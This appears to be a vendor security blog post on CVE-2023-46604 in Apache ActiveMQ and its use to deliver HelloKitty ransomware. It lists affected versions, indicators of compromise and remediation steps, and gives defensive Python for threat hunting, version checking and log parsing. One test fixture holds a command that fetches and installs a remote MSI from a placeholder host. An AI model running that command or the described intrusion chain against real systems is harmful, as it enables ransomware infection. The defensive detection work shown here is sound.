A suspected exploitation of CVE-2023-46604 in Apache ActiveMQ has been identified in two different customer environments.
Here’s everything you need to know:
What is CVE-2023-46604?
CVE-2023-46604 is an instance of a Remote Code Execution (RCE) vulnerability found within Apache ActiveMQ. The flaw enables a remote attacker, who has network access to a broker, to execute arbitrary shell commands. They can achieve this by manipulating serialized class types in the OpenWire protocol, which in turn causes the broker to instantiate any class available on the classpath.
Despite the intricate description, the root cause of this vulnerability is insecure deserialization.
On October 25, 2023, the vulnerability was made public by Apache, and new versions of ActiveMQ were introduced. Both the proof-of-concept (PoC) exploit code and specific vulnerability details are now accessible to the public.
Based on the available evidence and the ransom note, the activity has been attributed to the HelloKitty ransomware family, whose source code was leaked on a forum in early October 2023. Similar indicators of compromise were observed across the affected customer environments, which had been running outdated versions of Apache ActiveMQ.
On successful exploitation, the attacker's commands run from the broker's own java.exe, in both incidents located at D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64; this java.exe was identified as the parent process of the malicious activity in both cases. Following exploitation, the adversary attempted to execute remote binaries named M2.png and M4.png using MSIExec. The threat actor's attempts to deploy ransomware lacked finesse: one of the monitored incidents included unsuccessful attempts to encrypt assets.
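The process chain described above (the broker's java.exe spawning msiexec.exe to install a remote package) is a hunting pivot on its own. The following is an added example, not code from the original post or from Rapid7: it runs that rule over constructed process-creation events (sample paths and the 203.0.113.10 address are made up) and returns the matching command lines.

```python
import ntpath

# Constructed sample process-creation events (not real telemetry). The field names
# follow what EDR / Sysmon process-creation records typically carry.
EVENTS = [
    {"parent_image": r"D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64\java.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec /q /i http://203.0.113.10/M2.png"},   # constructed address
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec /i C:\Users\a\Downloads\tool.msi"},  # benign local install
    {"parent_image": r"D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64\java.exe",
     "image": r"D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64\wrapper.exe",
     "command_line": "wrapper.exe -s"},                             # normal broker child
]


def is_suspicious_activemq_child(event):
    """True when the ActiveMQ broker's java.exe spawns msiexec installing a remote package."""
    parent = event["parent_image"].lower()
    child = ntpath.basename(event["image"].lower())
    cmd = event["command_line"].lower()
    # Parent must be a java.exe living under an ActiveMQ install directory.
    parent_is_broker = ntpath.basename(parent) == "java.exe" and "activemq" in parent
    # Child must be msiexec pulling its package from a URL (M2.png / M4.png were remote).
    remote_msi = child == "msiexec.exe" and ("http://" in cmd or "https://" in cmd)
    return parent_is_broker and remote_msi


def hunt(events):
    """Return the command lines of events matching the java.exe -> msiexec chain."""
    return [e["command_line"] for e in events if is_suspicious_activemq_child(e)]


if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print("suspicious:", hit)
```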
What is HelloKitty Ransomware in this context?
The researchers obtained the MSI files M4.png and M2.png from 172.245.16[.]125 and analyzed them in a controlled environment. Both MSI files contained a 32-bit .NET executable internally named dllloader, which loads a Base64-encoded payload; once decoded, that payload turned out to be a 32-bit .NET DLL named EncDLL.
The EncDLL binary displayed ransomware-like functionality: it identified and terminated specific processes, and our team observed that it could encrypt files with specific extensions using the .NET RSACryptoServiceProvider class, appending the .locked extension to encrypted files. It also contained a function specifying which directories to exclude from encryption, a static variable holding the ransom note, and a function that attempted to communicate with an HTTP server at 172.245.16[.]125.
The ransomware note indicated that communication should be established through the email address service@hellokittycat[.]online.
Does CVE-2023-46604 affect me?
According to Apache’s advisory, CVE-2023-46604 affects the following versions of ActiveMQ:
Apache ActiveMQ 5.18.0 before 5.18.3
Apache ActiveMQ 5.17.0 before 5.17.6
Apache ActiveMQ 5.16.0 before 5.16.7
Apache ActiveMQ before 5.15.16
Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16
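To turn the version list above into a check that can be run against an inventory, here is an added example (not code from the original post or from Apache). It encodes each "X before Y" entry as a half-open range, parses a version out of a string such as the install path seen in the incidents, and reports the first fixed release of the matching branch.

```python
import re

# Affected ranges from the advisory entries above, as (first affected, first fixed).
# A version v is affected when first_affected <= v < first_fixed.
BROKER_RANGES = [
    ((5, 18, 0), (5, 18, 3)),
    ((5, 17, 0), (5, 17, 6)),
    ((5, 16, 0), (5, 16, 7)),
    ((0, 0, 0), (5, 15, 16)),   # "before 5.15.16": every earlier broker release
]
LEGACY_OPENWIRE_RANGES = [
    ((5, 18, 0), (5, 18, 3)),
    ((5, 17, 0), (5, 17, 6)),
    ((5, 16, 0), (5, 16, 7)),
    ((5, 8, 0), (5, 15, 16)),
]


def parse_version(text):
    """Turn '5.15.3' (or 'apache-activemq-5.15.3') into a comparable tuple."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version in {text!r}")
    return tuple(int(p) for p in m.groups())


def check_cve_2023_46604(version_text, legacy_openwire=False):
    """Return (affected, upgrade_to): upgrade_to is the first fixed release of the
    matching branch, or None when the version falls in no affected range."""
    v = parse_version(version_text)
    ranges = LEGACY_OPENWIRE_RANGES if legacy_openwire else BROKER_RANGES
    for first_affected, first_fixed in ranges:
        if first_affected <= v < first_fixed:
            return True, ".".join(map(str, first_fixed))
    return False, None


if __name__ == "__main__":
    # The install path observed in the incidents names release 5.15.3.
    path = r"D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64"
    print(check_cve_2023_46604(path))  # (True, '5.15.16')
```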
Has CVE-2023-46604 been actively exploited in the wild?
Forensic evidence indicates that exploitation of CVE-2023-46604 had already been spotted in the wild by Arctic Wolf Labs as early as October 10, 2023, well before the CVE was disclosed or any proof-of-concept exploit code became available. Following successful exploitation of CVE-2023-46604, there were instances of 45.32.120[.]181 deploying SparkRAT. More recently, two distinct ransomware campaigns were detected, both using this vulnerability to gain initial access. These campaigns originated from the IP address 172.245.16[.]125, which was also observed delivering additional payloads as part of the ransomware attacks.
Rapid7's vulnerability research team has analyzed CVE-2023-46604 and made public exploit code available. In their test setup, activemq.log contained a single line entry for a successful exploitation of CVE-2023-46604. Below is the log line produced by the researcher's ("attacker's") exploit, with their IP being 192.168.86.35 and the target TCP port 61616:
2023-10-31 05:04:58,736 | WARN | Transport Connection to: tcp://192.168.86.35:15871 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.168.86.35:15871@61616
The Rapid7 vulnerability research team has taken the public proof-of-concept and verified that the observed behavior in customer environments aligns with what we would anticipate from the exploitation of CVE-2023-46604. In-depth technical analysis of this vulnerability by Rapid7 research is available on AttackerKB.
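Because the log line above is the only trace the broker leaves, a hunt across activemq.log comes down to pulling the remote endpoint and exception class out of WARN transport failures on the OpenWire port. The following parser is an added example, not code from the original post or from Rapid7; its sample lines are constructed (the first mirrors the entry above with a documentation-range address in place of the researcher's IP).

```python
import re

# Matches the activemq.log layout shown above: timestamp | level | message | logger | thread.
LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \| (?P<level>\w+) \| Transport Connection to: "
    r"tcp://(?P<ip>[\d.]+):(?P<port>\d+) failed: (?P<reason>[^|]+?) \| "
    r"(?P<logger>\S+) \| ActiveMQ Transport: tcp:///[\d.]+:\d+@(?P<local_port>\d+)\s*$"
)

# Constructed sample log (not real data): an aborted-connection WARN like the one
# above, an ordinary startup INFO line, and a client that simply hung up (EOF).
SAMPLE_LOG = """\
2023-10-31 05:04:58,736 | WARN | Transport Connection to: tcp://192.0.2.35:15871 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.0.2.35:15871@61616
2023-10-31 05:10:01,002 | INFO | Apache ActiveMQ 5.15.3 (localhost, ID:broker-1) started | org.apache.activemq.broker.BrokerService | main
2023-10-31 05:12:14,118 | WARN | Transport Connection to: tcp://10.0.0.5:50122 failed: java.io.EOFException | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///10.0.0.5:50122@61616
"""


def transport_failures(text, openwire_port="61616"):
    """Return (remote ip, remote port, exception class) for each WARN transport
    failure on the broker's OpenWire listener; other lines are ignored."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and m["level"] == "WARN" and m["local_port"] == openwire_port:
            exc = m["reason"].split(":")[0].strip()   # drop the OS-specific message
            hits.append((m["ip"], int(m["port"]), exc))
    return hits


def aborted_connections(text):
    """Narrow to the SocketException aborts seen in the exploit test, so the
    remote IPs can be checked against firewall logs and threat intel."""
    return [h for h in transport_failures(text) if h[2] == "java.net.SocketException"]


if __name__ == "__main__":
    for ip, port, exc in aborted_connections(SAMPLE_LOG):
        print(f"review source {ip}:{port} ({exc})")
```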
How to fix CVE-2023-46604
To remediate the vulnerability, organizations should promptly upgrade to a fixed version of ActiveMQ. Users of Apache ActiveMQ are advised to update to a fixed release (5.15.16, 5.16.7, 5.17.6, or 5.18.3, per the advisory versions listed above) to remediate this issue:
Additionally, admins should assess their environments for the indicators of compromise described above. The updates provided by Apache are available via the link above, and for hardening ActiveMQ deployments, see Apache's guidance on securing ActiveMQ.
Rapid7 has advised its MDR, InsightIDR, and Managed Threat Complete (MTC) customers to ensure that the Insight Agent is installed on all relevant assets within their environments to maximize threat detection coverage.
To support detections for managed risk and managed detection and response customers, Arctic Wolf has published the intelligence it collected in a full report covering observed in-the-wild exploitation, binary analysis of the ransomware payload, and the IP address, domains, and bitcoin wallet address observed within the TellYouThePass ransomware variant.
Each new vulnerability is a reminder of where we stand, and what we need to do better. Check out the following resources to help you maintain cyber hygiene and stay ahead of the threat actors:
- Can you trust ChatGPT’s package recommendations?
- MITRE ATTACK framework – Mapping techniques to CVEs
- Exploit maturity: an introduction
- OWASP Top 10 vulnerabilities 2022: what we learned
- How to fix CVE-2023-32784 in KeePass password manager
Don’t get found out by new vulnerabilities. Vulcan Cyber gives you full visibility and oversight of your threat environment and lets you prioritize, remediate and communicate your cyber risk across your entire organization. Get a demo today.